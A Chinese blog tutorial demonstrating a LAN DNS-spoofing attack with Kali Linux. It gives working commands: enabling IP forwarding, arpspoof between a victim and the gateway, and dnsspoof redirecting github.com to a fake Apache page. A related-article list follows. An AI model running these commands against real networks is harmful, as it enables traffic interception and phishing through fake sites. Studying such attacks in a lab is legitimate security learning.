DNS缓存(DNS劫持)攻击过程演示

最新推荐文章于 2024-05-21 15:02:24 发布
最新推荐文章于 2024-05-21 15:02:24 发布
阅读量2.6k 收藏 29
点赞数 3
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MOruilichun/article/details/107734937
版权

DNS缓存攻击原理

DNS缓存攻击是通过欺骗域名服务器的缓存条目(即:域名到ip地址的映射)。当目标计算机访问被欺骗的域名时,会把域名转发到一个被我们伪装的站点下。而访问者却并不知道访问的是一个假网站。

当计算机要访问本地或者Internet上的站点时,操作系统首先需要知道该站点的确切IP。但是记住ip是一件困难的事情,所以基本上每个站点都有一个域名。而计算机去访问站点的时候如果拿到的是域名,那么去寻找网络中的一台DNS 服务器,通过该域名服务器提供的域名解析服务将域名转换为真实的ip地址再进行访问大概的流程如下
DNS解析
使用nslookup 查看github地址

可以看到nslookup将GitHub.com翻译为12.229.188.59。如果本地DNS服务器缓存中具有这个地址的条目,它便把正确的ip地址返回给查询终端。如果它的缓存条目里没有这条记录,它将联系Iternet上的DNS服务器寻找相应的地址信息。最终目的在用户不需要知道ip地址的情况下正确的通过URL地址来访问GitHub.com

开始模拟一个DNS攻击

DNS攻击:就是发送一堆DNS域名指向错误的服务器地址。

首先我们先来启动一个网页,这里用kali自带的一个站点

//输入命令
/etc/init.d/apache2 start

这时我们得到kali自带的Apache的默认站点,测试的话用这个就够了。

apache2默认页面
##我们现在需要做一个ip转发

//输入命令
echo 1 > /proc/sys/net/ipv4/ip_forward

然后开两个窗口对靶机和网关之间做一个流量劫持

arpspoof  -i  eth0 -t 192.168.3.23 192.168.3.1
arpspoof  -i  eth0 -t 192.168.3.1 192.168.3.23
//192.168.3.23是我的靶机

dns网关劫持

接下来了我们将github.com指向这个页面的地址

dnsspoof -i eth0 -f  hosts.txt

在这里插入图片描述

我们在靶机ping github.com

假页面
发现github的指向变了

浏览器访问一下试试
在这里插入图片描述
成功进入了假页面

  • 如果你没有dnsspoof命令的话需要自己安装一下
apt-get install dsniff

DNS过程演示就结束了,自己动手试试吧

了解更多渗透技术可关注公众号 :安全命令 (ID:safecmd)
​​​​在这里插入图片描述

安全命令
关注
  • 3
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
详解DNS缓存中毒攻击原理以及dns病毒解决办法
10-01
现在大家都知道,缓存中毒攻击者给DNS服务器注入非法网络域名地址,如果服务器接受这个非法地址,那么缓存就被攻破了
修复本地连接无法清除DNS缓存的的解决方案
10-01
当遇到“修复本地连接无法清除DNS缓存”的问题时,这通常是由于系统服务配置不当或网络设置出错导致的。DNS缓存是Windows操作系统中存储域名解析结果的临时数据库,当网络连接出现问题时,尝试修复可能会涉及到清理...
关于 DNS缓存投毒
碎片整理
01-05 3110
最近安装了eset之后,开始报出警报 DNS缓存投毒,投毒二字太过扎眼,所以网上搜索了下,转载下文。     原地址:http://www.ttrar.com/article/nod32/Nod32-DNS.html 摘录: ———————————————————————————————————————————————————————— ​什么是DNS缓存投毒:
什么是DNS缓存投毒攻击,有什么防护措施
最新发布
dexunyun的博客
05-21 1027
在了解DNS缓存投毒攻击之前,我们先来了解下什么是DNS缓存DNS系统采用树状分形结构,在标准解析链条中,递归服务器在接收到客户主机发起的解析请求后,会发起全球迭代查询,最终在域名授权的权威服务器获得最终的解析记录。为了缩短解析时间,提高域名解析和web访问的速度,DNS系统引入了缓存机制。这种缓存机制可以加速后续的相同查询,因为设备可以直接从缓存中提取先前的查询结果,而不需要再次到外部的DNS服务器去查询。
本地主机DNS劫持演示及防范
weixin_33755649的博客
03-03 271
劫持演示                                                                                      如果要进行DNS劫持的话,需要在被劫持电脑上有apache或者Nginx服务,或者劫持人有一台服务器之类的。 相信大家了解DNS,这里就不多说了。 直接上图: 在C:\Windows\System32\dr...
DNS缓存攻击
qq_43776408的博客
11-02 339
DNS解析流程: 主机要访问A网站的页面,通过本地DNS解析器查询相应的域名,若没有则通过另外一台DNS服务器继续 查询,若查询到了就返回A的IP地址,用户就可以通过A的IP进行访问了 ///////////////////////////////// DNS缓存攻击就是发送一堆错误的DNS域名解析器指向错误的IP地址 ///////////////////////////////// ...
课时10:网络安全基础(DNS劫持
m0_60651303的博客
07-03 118
本质第一步:浏览器缓存
DNS域名劫持服务器DnsServer-2019.zip
07-27
- 避免访问未经认证的公共Wi-Fi网络,因为这些网络更容易遭受DNS劫持。 - 用户应定期检查自己的网络设备设置,确保未被恶意篡改DNS配置。 综上所述,DNS域名劫持网络安全的一大威胁,了解其工作原理和防范措施...
edgedns:专为内容交付网络设计的高性能DNS缓存
02-05
4. **安全性设计**:由于DNS网络基础架构的重要组成部分,edgedns可能采用了防止DNS劫持、DDoS攻击和其他网络安全威胁的策略。 5. **高性能缓存**:高性能DNS缓存意味着edgedns具备快速响应能力,减少网络延迟,...
DNS.rar_dns _dns ppt
09-23
3. DNS缓存中毒:避免缓存中存储错误或恶意信息,定期清理DNS缓存。 六、DNS在实际应用中的案例 1. 动态DNS(DDNS):使动态IP的设备(如家庭路由器)能通过固定域名访问。 2. CDN(内容分发网络):利用DNS智能...
WinDNSSpoof DNS漏洞利用工具
09-22
常见的windows DNS漏洞利用工具,小巧好用的一款工具。
dns.rar_dns
09-19
这些特征码有助于识别潜在的网络攻击,例如DNS劫持DNS放大攻击等。 2. **源代码分析**:"dns.c"是C语言编写的源代码,它可能包含了实现DNS特征码检测的算法。这可能包括解析DNS报文结构,提取关键字段,对比预...
[计算机网络安全实验] DNS攻击实验
热门推荐
LostUnravel的博客
11-12 1万+
心得体会,以及对本实验的意见和建议略。
域名劫持
架构师小秘圈
01-25 1850
作者:sarleon 来自:freebuf.com01 原理DNS决定的是我们的域名将解析到哪一个IP地址的记录,是基于UDP协议的一种应用层协议 这个攻击的前提是攻击者掌控了你的网关(可以是路由器,交换机,或者运营商),一般来说,在一个WLAN下面,使用ARP劫持就可以达到此效果。你在访问一个网站的过程中,经历了如下几个阶段: 以访问freebuf的主页为例:1、地址栏输入freebuf.com
DNS劫持实现
qq_41712727的博客
09-23 285
场景 开启并配置DHCP 开启并配置DNS 外网通信配置
局域网dns欺骗攻击不能上网_局域网下实现劫持其他人设备
weixin_39912163的博客
12-28 222
使用系统:Kali Linux免费无毒下载地址:https://www.kali.org/以下内容是本人的渗透技术学习笔记,由于本篇文章比较敏感,所以这里只列举最基础的劫持手法,感兴趣的各位请自行拓展。教程全程小白教学,无需掌握任何技术。教程最终可实现,在局域网下可监控其他在局域网下的任何设备。可以查看对方浏览的网页等等信息,也可以拦截对方的数据包让对象无法联网。教程开始。1、创建一个名...
DNS劫持
weixin_45597678的博客
11-19 4566
文章目录原理实操复现防御 原理 DNS的全称为Domain Name Server也就是域名服务,在真实环境中我们人是很难记住一串没有规律的ip地址的,所以引入了域名方便人们的记忆和访问但是数据包在网络的传输是以ip地址来寻址的,这就导致需要一种服务来提供从域名到ip的转换,而DNS就是这样一种服务。 这里再介绍一下访问一个网址的时候解析域名会经过哪些步骤吧: 首先会访问我们的本地DNS缓存查看是否有该域名的一个解析记录有的话会取该记录的映射ip进行发送数据包 如果本地DNS缓存没有该域名的解析记录的话,
简单的进行DNS劫持
Dream丶Boy
01-06 5383
在终端输入:vim /etc/ettercap/etter.dns来编辑dns文件,可以删除里面所有的内容,因为都是演示, 可以新增你需要劫持的域名和目标IP,格式和host文件一致 www.baidu.com A 192.168.1.101 上面的www.baidu.com是目标域名,A是解析的方式,后面的IP就是我们的IP。 在终端输入:ettercap -G启动ettercap客户端 选择网卡后点击右上角启动,启动后,左上角点击放大镜进行扫描 然后点击放大镜右边的服务器列表可以看见所有在线的机器,
DNS枚举攻击是什么和什么
06-09
DNS枚举攻击是一种利用DNS服务器漏洞和查询技术,获取目标主机的IP地址、域名、操作系统、网络拓扑等敏感信息的攻击方式。攻击者通过查询DNS服务器,获取目标主机相关的DNS记录和信息,从而获取目标主机的敏感信息,为后续攻击提供便利。 DNS枚举攻击通常基于字典、区域传输、DNS缓存、反向解析、DNS劫持等技术手段,攻击者可以利用这些技术手段,快速地获取目标主机的信息。为了防止DNS枚举攻击,用户和企业应该加强DNS服务器的安全防护,采取必要的安全措施,如限制DNS服务器的访问权限、使用DNS缓存服务器、定期更新DNS服务器软件等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值